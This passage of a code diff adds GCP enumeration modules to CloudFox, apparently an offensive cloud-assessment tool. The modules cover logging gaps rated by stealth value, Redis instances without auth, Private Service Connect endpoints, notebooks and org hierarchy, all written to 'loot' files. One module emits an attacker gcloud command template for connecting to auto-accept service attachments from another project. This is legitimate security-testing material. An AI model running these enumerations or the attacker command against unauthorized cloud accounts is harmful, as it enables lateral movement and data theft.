+ gap.StealthValue, + gap.ResourceType, + gap.ResourceName, + gap.LoggingStatus, + missingLogs, + gap.ProjectID, + }) + } + + // Summary by type table + typeHeader := []string{ + "Resource Type", + "Count", + "Critical", + "High", + } + + typeCounts := make(map[string]struct { + total int + critical int + high int + }) + + for _, gap := range m.Gaps { + counts := typeCounts[gap.ResourceType] + counts.total++ + if gap.StealthValue == "CRITICAL" { + counts.critical++ + } else if gap.StealthValue == "HIGH" { + counts.high++ + } + typeCounts[gap.ResourceType] = counts + } + + var typeBody [][]string + for resourceType, counts := range typeCounts { + typeBody = append(typeBody, []string{ + resourceType, + fmt.Sprintf("%d", counts.total), + fmt.Sprintf("%d", counts.critical), + fmt.Sprintf("%d", counts.high), + }) + } + + // Collect loot files + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + + // Build tables + tables := []internal.TableFile{ + { + Name: "logging-gaps", + Header: header, + Body: body, + }, + } + + if len(typeBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "logging-gaps-summary", + Header: typeHeader, + Body: typeBody, + }) + } + + output := LoggingGapsOutput{ + Table: tables, + Loot: lootFiles, + } + + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + m.ProjectIDs, + m.ProjectIDs, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_LOGGINGGAPS_MODULE_NAME) + m.CommandCounter.Error++ + } +} diff --git a/gcp/commands/memorystore.go b/gcp/commands/memorystore.go new file mode 100644 index 00000000..1819337f --- /dev/null +++ b/gcp/commands/memorystore.go @@ -0,0 +1,179 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + memorystoreservice "github.com/BishopFox/cloudfox/gcp/services/memorystoreService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPMemorystoreCommand = &cobra.Command{ + Use: globals.GCP_MEMORYSTORE_MODULE_NAME, + Aliases: []string{"redis", "cache"}, + Short: "Enumerate Memorystore (Redis) instances", + Long: `Enumerate Memorystore for Redis instances with security analysis. + +Features: +- Lists all Redis instances +- Shows authentication and encryption status +- Identifies network configuration +- Detects security misconfigurations`, + Run: runGCPMemorystoreCommand, +} + +type MemorystoreModule struct { + gcpinternal.BaseGCPModule + RedisInstances []memorystoreservice.RedisInstanceInfo + LootMap map[string]*internal.LootFile + mu sync.Mutex +} + +type MemorystoreOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o MemorystoreOutput) TableFiles() []internal.TableFile { return o.Table } +func (o MemorystoreOutput) LootFiles() []internal.LootFile { return o.Loot } + +func runGCPMemorystoreCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_MEMORYSTORE_MODULE_NAME) + if err != nil { + return + } + + module := &MemorystoreModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + RedisInstances: []memorystoreservice.RedisInstanceInfo{}, + LootMap: make(map[string]*internal.LootFile), + } + + module.initializeLootFiles() + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +func (m *MemorystoreModule) Execute(ctx context.Context, logger internal.Logger) { + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_MEMORYSTORE_MODULE_NAME, m.processProject) + + if len(m.RedisInstances) == 0 { + logger.InfoM("No Memorystore instances found", globals.GCP_MEMORYSTORE_MODULE_NAME) + return + } + + noAuth := 0 + for _, instance := range m.RedisInstances { + if !instance.AuthEnabled { + noAuth++ + } + } + + logger.SuccessM(fmt.Sprintf("Found %d Redis instance(s) (%d without auth)", + len(m.RedisInstances), noAuth), globals.GCP_MEMORYSTORE_MODULE_NAME) + + m.writeOutput(ctx, logger) +} + +func (m *MemorystoreModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating Memorystore in project: %s", projectID), globals.GCP_MEMORYSTORE_MODULE_NAME) + } + + svc := memorystoreservice.New() + instances, err := svc.ListRedisInstances(projectID) + if err != nil { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Could not list Redis instances: %v", err), globals.GCP_MEMORYSTORE_MODULE_NAME) + } + return + } + + m.mu.Lock() + m.RedisInstances = append(m.RedisInstances, instances...) + for _, instance := range instances { + m.addInstanceToLoot(instance) + } + m.mu.Unlock() +} + +func (m *MemorystoreModule) initializeLootFiles() { + m.LootMap["memorystore-instances"] = &internal.LootFile{ + Name: "memorystore-instances", + Contents: "# Memorystore Redis Instances\n# Generated by CloudFox\n\n", + } + m.LootMap["memorystore-endpoints"] = &internal.LootFile{ + Name: "memorystore-endpoints", + Contents: "", + } +} + +func (m *MemorystoreModule) addInstanceToLoot(instance memorystoreservice.RedisInstanceInfo) { + m.LootMap["memorystore-instances"].Contents += fmt.Sprintf( + "# Instance: %s\n# Host: %s:%d\n# Auth: %v\n# Encryption: %s\n\n", + instance.Name, + instance.Host, + instance.Port, + instance.AuthEnabled, + instance.TransitEncryption, + ) + m.LootMap["memorystore-endpoints"].Contents += fmt.Sprintf("%s:%d\n", instance.Host, instance.Port) +} + +func (m *MemorystoreModule) writeOutput(ctx context.Context, logger internal.Logger) { + header := []string{ + "Name", + "Location", + "Tier", + "Memory (GB)", + "Version", + "Host:Port", + "Auth", + "Encryption", + "State", + "Risk", + "Project", + } + + var body [][]string + for _, instance := range m.RedisInstances { + auth := "No" + if instance.AuthEnabled { + auth = "Yes" + } + body = append(body, []string{ + instance.Name, + instance.Location, + instance.Tier, + fmt.Sprintf("%d", instance.MemorySizeGB), + instance.RedisVersion, + fmt.Sprintf("%s:%d", instance.Host, instance.Port), + auth, + instance.TransitEncryption, + instance.State, + instance.RiskLevel, + instance.ProjectID, + }) + } + + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + + tables := []internal.TableFile{{Name: "memorystore", Header: header, Body: body}} + + output := MemorystoreOutput{Table: tables, Loot: lootFiles} + + err := internal.HandleOutputSmart("gcp", m.Format, m.OutputDirectory, m.Verbosity, m.WrapTable, + "project", m.ProjectIDs, m.ProjectIDs, m.Account, output) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_MEMORYSTORE_MODULE_NAME) + } +} diff --git a/gcp/commands/networkendpoints.go b/gcp/commands/networkendpoints.go new file mode 100644 index 00000000..97931a4b --- /dev/null +++ b/gcp/commands/networkendpoints.go @@ -0,0 +1,409 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + networkendpointsservice "github.com/BishopFox/cloudfox/gcp/services/networkEndpointsService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPNetworkEndpointsCommand = &cobra.Command{ + Use: globals.GCP_NETWORKENDPOINTS_MODULE_NAME, + Aliases: []string{"psc", "private-service-connect", "endpoints"}, + Short: "Enumerate Private Service Connect endpoints and service attachments", + Long: `Enumerate Private Service Connect (PSC) endpoints, private connections, and service attachments. + +Private Service Connect allows private connectivity to Google APIs and services, +as well as to services hosted by other organizations. + +Security Relevance: +- PSC endpoints provide internal network paths to external services +- Service attachments expose internal services to other projects +- Private connections (VPC peering for managed services) provide access to Cloud SQL, etc. +- These can be used for lateral movement or data exfiltration + +What this module finds: +- PSC forwarding rules (consumer endpoints) +- Service attachments (producer endpoints) +- Private service connections (e.g., to Cloud SQL private IPs) +- Connection acceptance policies (auto vs manual)`, + Run: runGCPNetworkEndpointsCommand, +} + +// ------------------------------ +// Module Struct +// ------------------------------ +type NetworkEndpointsModule struct { + gcpinternal.BaseGCPModule + + PSCEndpoints []networkendpointsservice.PrivateServiceConnectEndpoint + PrivateConnections []networkendpointsservice.PrivateConnection + ServiceAttachments []networkendpointsservice.ServiceAttachment + LootMap map[string]*internal.LootFile + mu sync.Mutex +} + +// ------------------------------ +// Output Struct +// ------------------------------ +type NetworkEndpointsOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o NetworkEndpointsOutput) TableFiles() []internal.TableFile { return o.Table } +func (o NetworkEndpointsOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPNetworkEndpointsCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_NETWORKENDPOINTS_MODULE_NAME) + if err != nil { + return + } + + module := &NetworkEndpointsModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + PSCEndpoints: []networkendpointsservice.PrivateServiceConnectEndpoint{}, + PrivateConnections: []networkendpointsservice.PrivateConnection{}, + ServiceAttachments: []networkendpointsservice.ServiceAttachment{}, + LootMap: make(map[string]*internal.LootFile), + } + + module.initializeLootFiles() + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *NetworkEndpointsModule) Execute(ctx context.Context, logger internal.Logger) { + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_NETWORKENDPOINTS_MODULE_NAME, m.processProject) + + totalFindings := len(m.PSCEndpoints) + len(m.PrivateConnections) + len(m.ServiceAttachments) + + if totalFindings == 0 { + logger.InfoM("No network endpoints found", globals.GCP_NETWORKENDPOINTS_MODULE_NAME) + return + } + + logger.SuccessM(fmt.Sprintf("Found %d PSC endpoint(s), %d private connection(s), %d service attachment(s)", + len(m.PSCEndpoints), len(m.PrivateConnections), len(m.ServiceAttachments)), globals.GCP_NETWORKENDPOINTS_MODULE_NAME) + + // Count high-risk findings + autoAcceptCount := 0 + for _, sa := range m.ServiceAttachments { + if sa.ConnectionPreference == "ACCEPT_AUTOMATIC" { + autoAcceptCount++ + } + } + if autoAcceptCount > 0 { + logger.InfoM(fmt.Sprintf("[HIGH] %d service attachment(s) auto-accept connections from any project", autoAcceptCount), globals.GCP_NETWORKENDPOINTS_MODULE_NAME) + } + + m.writeOutput(ctx, logger) +} + +// ------------------------------ +// Project Processor +// ------------------------------ +func (m *NetworkEndpointsModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Checking network endpoints in project: %s", projectID), globals.GCP_NETWORKENDPOINTS_MODULE_NAME) + } + + svc := networkendpointsservice.New() + + // Get PSC endpoints + pscEndpoints, err := svc.GetPrivateServiceConnectEndpoints(projectID) + if err != nil { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.ErrorM(fmt.Sprintf("Error getting PSC endpoints for %s: %v", projectID, err), globals.GCP_NETWORKENDPOINTS_MODULE_NAME) + } + } + + // Get private connections + privateConns, err := svc.GetPrivateConnections(projectID) + if err != nil { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.ErrorM(fmt.Sprintf("Error getting private connections for %s: %v", projectID, err), globals.GCP_NETWORKENDPOINTS_MODULE_NAME) + } + } + + // Get service attachments + attachments, err := svc.GetServiceAttachments(projectID) + if err != nil { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.ErrorM(fmt.Sprintf("Error getting service attachments for %s: %v", projectID, err), globals.GCP_NETWORKENDPOINTS_MODULE_NAME) + } + } + + m.mu.Lock() + m.PSCEndpoints = append(m.PSCEndpoints, pscEndpoints...) + m.PrivateConnections = append(m.PrivateConnections, privateConns...) + m.ServiceAttachments = append(m.ServiceAttachments, attachments...) + + for _, endpoint := range pscEndpoints { + m.addPSCEndpointToLoot(endpoint) + } + for _, conn := range privateConns { + m.addPrivateConnectionToLoot(conn) + } + for _, attachment := range attachments { + m.addServiceAttachmentToLoot(attachment) + } + m.mu.Unlock() +} + +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *NetworkEndpointsModule) initializeLootFiles() { + m.LootMap["psc-endpoints"] = &internal.LootFile{ + Name: "psc-endpoints", + Contents: "# Private Service Connect Endpoints\n# Generated by CloudFox\n\n", + } + m.LootMap["private-connections"] = &internal.LootFile{ + Name: "private-connections", + Contents: "# Private Service Connections (VPC Peering for Managed Services)\n# Generated by CloudFox\n\n", + } + m.LootMap["service-attachments"] = &internal.LootFile{ + Name: "service-attachments", + Contents: "# PSC Service Attachments (Producer Side)\n# Generated by CloudFox\n\n", + } + m.LootMap["auto-accept-attachments"] = &internal.LootFile{ + Name: "auto-accept-attachments", + Contents: "# HIGH RISK: Service Attachments with Auto-Accept\n# Generated by CloudFox\n# These accept connections from ANY project!\n\n", + } +} + +func (m *NetworkEndpointsModule) addPSCEndpointToLoot(endpoint networkendpointsservice.PrivateServiceConnectEndpoint) { + m.LootMap["psc-endpoints"].Contents += fmt.Sprintf( + "## [%s] %s\n"+ + "## Project: %s | Region: %s\n"+ + "## Network: %s | Subnet: %s\n"+ + "## IP Address: %s\n"+ + "## Target Type: %s\n"+ + "## Target: %s\n"+ + "## Connection State: %s\n", + endpoint.RiskLevel, endpoint.Name, + endpoint.ProjectID, endpoint.Region, + endpoint.Network, endpoint.Subnetwork, + endpoint.IPAddress, + endpoint.TargetType, + endpoint.Target, + endpoint.ConnectionState, + ) + for _, reason := range endpoint.RiskReasons { + m.LootMap["psc-endpoints"].Contents += fmt.Sprintf("## - %s\n", reason) + } + for _, cmd := range endpoint.ExploitCommands { + m.LootMap["psc-endpoints"].Contents += cmd + "\n" + } + m.LootMap["psc-endpoints"].Contents += "\n" +} + +func (m *NetworkEndpointsModule) addPrivateConnectionToLoot(conn networkendpointsservice.PrivateConnection) { + m.LootMap["private-connections"].Contents += fmt.Sprintf( + "## [%s] %s\n"+ + "## Project: %s | Network: %s\n"+ + "## Service: %s\n"+ + "## Peering: %s\n"+ + "## Reserved Ranges: %s\n"+ + "## Accessible Services: %s\n", + conn.RiskLevel, conn.Name, + conn.ProjectID, conn.Network, + conn.Service, + conn.PeeringName, + strings.Join(conn.ReservedRanges, ", "), + strings.Join(conn.AccessibleServices, ", "), + ) + for _, reason := range conn.RiskReasons { + m.LootMap["private-connections"].Contents += fmt.Sprintf("## - %s\n", reason) + } + m.LootMap["private-connections"].Contents += "\n" +} + +func (m *NetworkEndpointsModule) addServiceAttachmentToLoot(attachment networkendpointsservice.ServiceAttachment) { + m.LootMap["service-attachments"].Contents += fmt.Sprintf( + "## [%s] %s\n"+ + "## Project: %s | Region: %s\n"+ + "## Target Service: %s\n"+ + "## Connection Preference: %s\n"+ + "## Connected Endpoints: %d\n"+ + "## NAT Subnets: %s\n", + attachment.RiskLevel, attachment.Name, + attachment.ProjectID, attachment.Region, + attachment.TargetService, + attachment.ConnectionPreference, + attachment.ConnectedEndpoints, + strings.Join(attachment.NatSubnets, ", "), + ) + + if len(attachment.ConsumerAcceptLists) > 0 { + m.LootMap["service-attachments"].Contents += fmt.Sprintf("## Accept List: %s\n", strings.Join(attachment.ConsumerAcceptLists, ", ")) + } + if len(attachment.ConsumerRejectLists) > 0 { + m.LootMap["service-attachments"].Contents += fmt.Sprintf("## Reject List: %s\n", strings.Join(attachment.ConsumerRejectLists, ", ")) + } + + for _, reason := range attachment.RiskReasons { + m.LootMap["service-attachments"].Contents += fmt.Sprintf("## - %s\n", reason) + } + m.LootMap["service-attachments"].Contents += "\n" + + // Add to auto-accept loot if applicable + if attachment.ConnectionPreference == "ACCEPT_AUTOMATIC" { + m.LootMap["auto-accept-attachments"].Contents += fmt.Sprintf( + "## [HIGH] %s\n"+ + "## Project: %s | Region: %s\n"+ + "## Target Service: %s\n"+ + "## This service attachment accepts connections from ANY project!\n"+ + "## An attacker with their own GCP project can create a PSC endpoint to this service.\n"+ + "##\n"+ + "## To connect from another project:\n"+ + "gcloud compute forwarding-rules create attacker-psc-endpoint \\\n"+ + " --region=%s \\\n"+ + " --network=ATTACKER_VPC \\\n"+ + " --address=RESERVED_IP \\\n"+ + " --target-service-attachment=projects/%s/regions/%s/serviceAttachments/%s\n\n", + attachment.Name, + attachment.ProjectID, attachment.Region, + attachment.TargetService, + attachment.Region, + attachment.ProjectID, attachment.Region, attachment.Name, + ) + } +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *NetworkEndpointsModule) writeOutput(ctx context.Context, logger internal.Logger) { + var tables []internal.TableFile + + // PSC Endpoints table + if len(m.PSCEndpoints) > 0 { + header := []string{"Risk", "Name", "Region", "Network", "IP", "Target Type", "Target", "Project"} + var body [][]string + + for _, endpoint := range m.PSCEndpoints { + target := endpoint.Target + if len(target) > 40 { + target = "..." + target[len(target)-37:] + } + + body = append(body, []string{ + endpoint.RiskLevel, + endpoint.Name, + endpoint.Region, + endpoint.Network, + endpoint.IPAddress, + endpoint.TargetType, + target, + endpoint.ProjectID, + }) + } + + tables = append(tables, internal.TableFile{ + Name: "psc-endpoints", + Header: header, + Body: body, + }) + } + + // Private Connections table + if len(m.PrivateConnections) > 0 { + header := []string{"Risk", "Name", "Network", "Service", "Reserved Ranges", "Accessible Services", "Project"} + var body [][]string + + for _, conn := range m.PrivateConnections { + ranges := strings.Join(conn.ReservedRanges, ", ") + if len(ranges) > 30 { + ranges = ranges[:27] + "..." + } + + services := strings.Join(conn.AccessibleServices, ", ") + if len(services) > 30 { + services = services[:27] + "..." + } + + body = append(body, []string{ + conn.RiskLevel, + conn.Name, + conn.Network, + conn.Service, + ranges, + services, + conn.ProjectID, + }) + } + + tables = append(tables, internal.TableFile{ + Name: "private-connections", + Header: header, + Body: body, + }) + } + + // Service Attachments table + if len(m.ServiceAttachments) > 0 { + header := []string{"Risk", "Name", "Region", "Target Service", "Accept Policy", "Connected", "Project"} + var body [][]string + + for _, attachment := range m.ServiceAttachments { + body = append(body, []string{ + attachment.RiskLevel, + attachment.Name, + attachment.Region, + attachment.TargetService, + attachment.ConnectionPreference, + fmt.Sprintf("%d", attachment.ConnectedEndpoints), + attachment.ProjectID, + }) + } + + tables = append(tables, internal.TableFile{ + Name: "service-attachments", + Header: header, + Body: body, + }) + } + + // Collect loot files + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + + output := NetworkEndpointsOutput{ + Table: tables, + Loot: lootFiles, + } + + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + m.ProjectIDs, + m.ProjectIDs, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_NETWORKENDPOINTS_MODULE_NAME) + m.CommandCounter.Error++ + } +} diff --git a/gcp/commands/notebooks.go b/gcp/commands/notebooks.go new file mode 100644 index 00000000..2fb36706 --- /dev/null +++ b/gcp/commands/notebooks.go @@ -0,0 +1,233 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + notebooksservice "github.com/BishopFox/cloudfox/gcp/services/notebooksService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPNotebooksCommand = &cobra.Command{ + Use: globals.GCP_NOTEBOOKS_MODULE_NAME, + Aliases: []string{"nb", "jupyter", "workbench"}, + Short: "Enumerate Vertex AI Workbench notebooks", + Long: `Enumerate Vertex AI Workbench and legacy notebook instances. + +Features: +- Lists all notebook instances across locations +- Shows service account configuration +- Identifies public IP exposure +- Checks for GPU attachments +- Analyzes proxy access settings`, + Run: runGCPNotebooksCommand, +} + +type NotebooksModule struct { + gcpinternal.BaseGCPModule + Instances []notebooksservice.NotebookInstanceInfo + Runtimes []notebooksservice.RuntimeInfo + LootMap map[string]*internal.LootFile + mu sync.Mutex +} + +type NotebooksOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o NotebooksOutput) TableFiles() []internal.TableFile { return o.Table } +func (o NotebooksOutput) LootFiles() []internal.LootFile { return o.Loot } + +func runGCPNotebooksCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_NOTEBOOKS_MODULE_NAME) + if err != nil { + return + } + + module := &NotebooksModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + Instances: []notebooksservice.NotebookInstanceInfo{}, + Runtimes: []notebooksservice.RuntimeInfo{}, + LootMap: make(map[string]*internal.LootFile), + } + module.initializeLootFiles() + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +func (m *NotebooksModule) Execute(ctx context.Context, logger internal.Logger) { + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_NOTEBOOKS_MODULE_NAME, m.processProject) + + if len(m.Instances) == 0 && len(m.Runtimes) == 0 { + logger.InfoM("No notebook instances found", globals.GCP_NOTEBOOKS_MODULE_NAME) + return + } + + publicCount := 0 + for _, instance := range m.Instances { + if !instance.NoPublicIP { + publicCount++ + } + } + + logger.SuccessM(fmt.Sprintf("Found %d notebook instance(s) (%d with public IP), %d runtime(s)", + len(m.Instances), publicCount, len(m.Runtimes)), globals.GCP_NOTEBOOKS_MODULE_NAME) + m.writeOutput(ctx, logger) +} + +func (m *NotebooksModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating notebooks in project: %s", projectID), globals.GCP_NOTEBOOKS_MODULE_NAME) + } + + svc := notebooksservice.New() + + // Get instances + instances, err := svc.ListInstances(projectID) + if err != nil { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Could not list notebook instances: %v", err), globals.GCP_NOTEBOOKS_MODULE_NAME) + } + } else { + m.mu.Lock() + m.Instances = append(m.Instances, instances...) + for _, instance := range instances { + m.addToLoot(instance) + } + m.mu.Unlock() + } + + // Get runtimes + runtimes, err := svc.ListRuntimes(projectID) + if err == nil { + m.mu.Lock() + m.Runtimes = append(m.Runtimes, runtimes...) + m.mu.Unlock() + } +} + +func (m *NotebooksModule) initializeLootFiles() { + m.LootMap["notebooks"] = &internal.LootFile{ + Name: "notebooks", + Contents: "# Notebook Instances\n# Generated by CloudFox\n\n", + } + m.LootMap["notebook-service-accounts"] = &internal.LootFile{ + Name: "notebook-service-accounts", + Contents: "", + } +} + +func (m *NotebooksModule) addToLoot(instance notebooksservice.NotebookInstanceInfo) { + m.LootMap["notebooks"].Contents += fmt.Sprintf( + "# Instance: %s\n# Location: %s\n# State: %s\n# Service Account: %s\n# Public IP: %v\n\n", + instance.Name, instance.Location, instance.State, instance.ServiceAccount, !instance.NoPublicIP) + + if instance.ServiceAccount != "" { + m.LootMap["notebook-service-accounts"].Contents += instance.ServiceAccount + "\n" + } +} + +func (m *NotebooksModule) writeOutput(ctx context.Context, logger internal.Logger) { + var tables []internal.TableFile + + // Instances table + if len(m.Instances) > 0 { + header := []string{"Name", "Location", "State", "Machine Type", "Service Account", "Public IP", "GPU", "Risk", "Project"} + var body [][]string + for _, instance := range m.Instances { + publicIP := "No" + if !instance.NoPublicIP { + publicIP = "Yes" + } + gpu := "None" + if instance.AcceleratorCount > 0 { + gpu = fmt.Sprintf("%s x%d", instance.AcceleratorType, instance.AcceleratorCount) + } + sa := instance.ServiceAccount + if sa == "" { + sa = "(default)" + } else if len(sa) > 40 { + sa = sa[:37] + "..." + } + body = append(body, []string{ + instance.Name, + instance.Location, + instance.State, + instance.MachineType, + sa, + publicIP, + gpu, + instance.RiskLevel, + instance.ProjectID, + }) + } + tables = append(tables, internal.TableFile{ + Name: "notebook-instances", + Header: header, + Body: body, + }) + } + + // Runtimes table + if len(m.Runtimes) > 0 { + header := []string{"Name", "Location", "State", "Type", "Machine Type", "Risk", "Project"} + var body [][]string + for _, runtime := range m.Runtimes { + body = append(body, []string{ + runtime.Name, + runtime.Location, + runtime.State, + runtime.RuntimeType, + runtime.MachineType, + runtime.RiskLevel, + runtime.ProjectID, + }) + } + tables = append(tables, internal.TableFile{ + Name: "notebook-runtimes", + Header: header, + Body: body, + }) + } + + // High-risk findings + var highRiskBody [][]string + for _, instance := range m.Instances { + if instance.RiskLevel == "HIGH" || instance.RiskLevel == "MEDIUM" { + highRiskBody = append(highRiskBody, []string{ + instance.Name, + instance.RiskLevel, + strings.Join(instance.RiskReasons, "; "), + instance.ProjectID, + }) + } + } + + if len(highRiskBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "notebook-risks", + Header: []string{"Instance", "Risk Level", "Reasons", "Project"}, + Body: highRiskBody, + }) + } + + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + + output := NotebooksOutput{Table: tables, Loot: lootFiles} + + err := internal.HandleOutputSmart("gcp", m.Format, m.OutputDirectory, m.Verbosity, m.WrapTable, + "project", m.ProjectIDs, m.ProjectIDs, m.Account, output) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_NOTEBOOKS_MODULE_NAME) + } +} diff --git a/gcp/commands/organizations.go b/gcp/commands/organizations.go new file mode 100644 index 00000000..1ff0c555 --- /dev/null +++ b/gcp/commands/organizations.go @@ -0,0 +1,378 @@ +package commands + +import ( + "context" + "fmt" + "strings" + + orgsservice "github.com/BishopFox/cloudfox/gcp/services/organizationsService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPOrganizationsCommand = &cobra.Command{ + Use: globals.GCP_ORGANIZATIONS_MODULE_NAME, + Aliases: []string{"org", "orgs", "hierarchy"}, + Short: "Enumerate GCP organization hierarchy", + Long: `Enumerate GCP organization, folder, and project hierarchy. + +Features: +- Lists accessible organizations +- Shows folder structure +- Maps project relationships +- Displays resource hierarchy tree +- Shows ancestry paths for projects`, + Run: runGCPOrganizationsCommand, +} + +// ------------------------------ +// Module Struct with embedded BaseGCPModule +// ------------------------------ +type OrganizationsModule struct { + gcpinternal.BaseGCPModule + + // Module-specific fields + Organizations []orgsservice.OrganizationInfo + Folders []orgsservice.FolderInfo + Projects []orgsservice.ProjectInfo + Ancestry [][]orgsservice.HierarchyNode + LootMap map[string]*internal.LootFile +} + +// ------------------------------ +// Output Struct implementing CloudfoxOutput interface +// ------------------------------ +type OrganizationsOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o OrganizationsOutput) TableFiles() []internal.TableFile { return o.Table } +func (o OrganizationsOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPOrganizationsCommand(cmd *cobra.Command, args []string) { + // Initialize command context + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_ORGANIZATIONS_MODULE_NAME) + if err != nil { + return // Error already logged + } + + // Create module instance + module := &OrganizationsModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + Organizations: []orgsservice.OrganizationInfo{}, + Folders: []orgsservice.FolderInfo{}, + Projects: []orgsservice.ProjectInfo{}, + Ancestry: [][]orgsservice.HierarchyNode{}, + LootMap: make(map[string]*internal.LootFile), + } + + // Initialize loot files + module.initializeLootFiles() + + // Execute enumeration + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *OrganizationsModule) Execute(ctx context.Context, logger internal.Logger) { + orgsSvc := orgsservice.New() + + // Get organizations + orgs, err := orgsSvc.SearchOrganizations() + if err != nil { + logger.InfoM(fmt.Sprintf("Could not enumerate organizations: %v", err), globals.GCP_ORGANIZATIONS_MODULE_NAME) + } else { + m.Organizations = orgs + } + + // Get all folders + folders, err := orgsSvc.SearchAllFolders() + if err != nil { + logger.InfoM(fmt.Sprintf("Could not enumerate folders: %v", err), globals.GCP_ORGANIZATIONS_MODULE_NAME) + } else { + m.Folders = folders + } + + // Get all projects + projects, err := orgsSvc.SearchProjects("") + if err != nil { + logger.InfoM(fmt.Sprintf("Could not enumerate projects: %v", err), globals.GCP_ORGANIZATIONS_MODULE_NAME) + } else { + m.Projects = projects + } + + // Get ancestry for each specified project + for _, projectID := range m.ProjectIDs { + ancestry, err := orgsSvc.GetProjectAncestry(projectID) + if err != nil { + logger.InfoM(fmt.Sprintf("Could not get ancestry for project %s: %v", projectID, err), globals.GCP_ORGANIZATIONS_MODULE_NAME) + } else { + m.Ancestry = append(m.Ancestry, ancestry) + } + } + + // Generate loot + m.generateLoot() + + // Report findings + logger.SuccessM(fmt.Sprintf("Found %d organization(s), %d folder(s), %d project(s)", + len(m.Organizations), len(m.Folders), len(m.Projects)), globals.GCP_ORGANIZATIONS_MODULE_NAME) + + // Write output + m.writeOutput(ctx, logger) +} + +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *OrganizationsModule) initializeLootFiles() { + m.LootMap["org-hierarchy"] = &internal.LootFile{ + Name: "org-hierarchy", + Contents: "# GCP Organization Hierarchy\n# 